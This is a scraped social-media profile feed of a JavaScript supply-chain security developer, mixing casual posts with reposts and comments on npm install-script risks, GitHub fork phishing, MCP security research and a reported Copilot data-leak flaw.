Lightnews — Scholar-powered news

naugtur

@naugtur.pl

1.2K followers 240 following 2.3K posts

Working on supply chain security for JS. LavaMoat and Endo contributor. meet.js Poland organizer. Node.js user since v0.8. Addicted to teaching. https://naugtur.pl

naugtur.pl

Posts Media Videos Starter Packs

Pinned

naugtur @naugtur.pl · Jan 29

A Phish on a Fork, no Chips.

One more thing to beware in the world of software supply chain risks.

Read if you care about your GitHub actions or dependencies.

Or read it for the fish puns. 🫣

dev.to/naugtur/a-ph...

A Phish on a Fork, no Chips

So you were told that this is the safest way to install a package from github with npm: "test262":...

dev.to

2 4 8

Reposted by naugtur

Automerge @automerge.org · 10h

🎮 Like CRDTs and videogames? @inkandswitch.com is ✨hiring✨ for a project that combines @automerge.org with @godotengine.org to make the next generation of collaboration tools for game development!

More detail here: inkandswitch.com/jobs/godot-i...

(Fully remote 🌍🌎🌏 contract, late Nov to April)

Godot IDE Engineer

Help build native, visual version control for collaborative game development in Godot

inkandswitch.com

1 10 14

naugtur @naugtur.pl · 4h

Sounds exciting.

Yes, I do like them, while being bad at both 😅

My biggest achievement in CRDT was noticing that a bloom filter is a CRDT and failing to find a usecase for that little fact.

naugtur @naugtur.pl · 15h

🧡

naugtur @naugtur.pl · 1d

Whenever I say I've read some book and it's been an audiobook version I feel guilty if I don't do a disclaimer on that. I'd love for that feeling to go away.

1 1

naugtur @naugtur.pl · 1d

I honestly regret not taking more of those stickers last time!

1 2

naugtur @naugtur.pl · 1d

JSConf forever?

naugtur @naugtur.pl · 1d

Pecunia something something

naugtur @naugtur.pl · 1d

This is how you tell there's no longer a human consciousness in charge. Corporations reach a stage where decisions make themselves and are impenetrable to every individual involved.

naugtur @naugtur.pl · 1d

Took the name from the example package, so no invenation there.

Reposted by naugtur

Kasey Gifford @kaseygifford.bsky.social · 2d

We should be asking this
c o n s t a n t l y.

160 5K 16K

naugtur @naugtur.pl · 1d

@robertknight2.bsky.social You might find this amusing - I was working on an example malicious npm package and started typing curl in postinstall, which a copilot suggested to follow-up with a shell script from a hallucinated repository under your github username and pipe it to bash. 😅

1 1

Reposted by naugtur

Liran Tal @lirantal.com · 2d

Wrote up an article that explores the emerging security landscape surrounding MCP, highlighting key vulnerabilities and the importance of robust security measures in this evolving protocol: lirantal.com/blog/the-upr...

The Uprising of Model Context Protocol (MCP) Security Research

The Model Context Protocol (MCP) is gaining traction in the AI community, and with its rise comes a wave of security research. This article explores the emerging security landscape surrounding MCP, highlighting key vulnerabilities and the importance of robust security measures in this evolving protocol.

lirantal.com

1 5

naugtur @naugtur.pl · 2d

I bet there are npm mirrors that could serve the same purpose but I never looked for one.

naugtur @naugtur.pl · 2d

I tend to need it for exploration not the whole thing and they're often a single file change, so I go to socket.dev file esplorer and they always have a backup there. I download the individual file from raw view.

Reposted by naugtur

Uncle Joe @sydseter.com · 2d

The finding by Omer Mayraz regarding GitHub Copilot data exfiltration demonstrates why the AI revolution have shifted the balance of power from the cyber defender to the attacker. These systems have a stochastic nature, making attacking, easier than defending. www.securityweek.com/github-copil...

GitHub Copilot Chat Flaw Leaked Data From Private Repositories

A vulnerability in the GitHub Copilot Chat AI assistant led to sensitive data leakage and full control over Copilot’s responses.

www.securityweek.com

3 6 15

naugtur @naugtur.pl · 2d

Shoot first ask questions later 😁
github.com/lirantal/npm...

safely run selected scripts with allow-scripts by naugtur · Pull Request #4 · lirantal/npm-security-best-practices

github.com

1 1

Reposted by naugtur

Liran Tal @lirantal.com · 2d

HOW TO STOP THE NEXT SHAI HULUD ATTACK? 🥶

All about secure local development, npm security best practices and supply chain attack mitigations: github.com/lirantal/npm...

GitHub - lirantal/npm-security-best-practices: Collection of npm package manager Security Best Practices

Collection of npm package manager Security Best Practices - lirantal/npm-security-best-practices

github.com

3 5 11

naugtur @naugtur.pl · 2d

The advice to disable all scripts without accompanying advice on how to safely execute the ones you actually need will make people reach for 'npm rebuild' and expose themselves again.

Should I PR a reference to www.npmjs.com/package/@lav... ?

www.npmjs.com

1 1

naugtur @naugtur.pl · 2d

The smell is part of the matketing. When enshitification hits the business you'll be smelling last week's passenger's supper. Hopefully unused.

naugtur @naugtur.pl · 2d

Some people are left-handed, some are left-stomached 🤷‍♂️

naugtur @naugtur.pl · 2d

In honor of spooky month, share a 4 word horror story that only someone in your profession would understand.

"Switch to <language> Selenium"

Kris 🧙‍♂️ Kowal @kriskowal.com · 2d

In honor of spooky month, share a 4 word horror story that only someone in your profession would understand.

"Off by one"

Gretchen McCulloch @gretchenmcc.bsky.social · 2d

In honour of spooky month, share a 4 word horror story that only someone in your profession would understand.

"I'm correcting your grammar"

naugtur @naugtur.pl · 2d

Reminds me of when I wanted gpt to give me a code sample illustrating an async trampoline in JS and the example was good enough for me to understand, but it didn't work and I had to fix it 😅

naugtur @naugtur.pl · 2d

There was a time when electron apps and chrome were impacting each other's responsiveness on Linux somehow. No idea how that's possible.

naugtur @naugtur.pl · 2d

Firefox on mobile can be configured to ask before handing over to the app and while it's a bit clunky, it gives you back control.
I mean on android, never had an iphone 🤷‍♂️

naugtur @naugtur.pl · 2d

This dude in particular might have an overrepresentation of getting away with spewing nonsense in his daily life 😅

1 1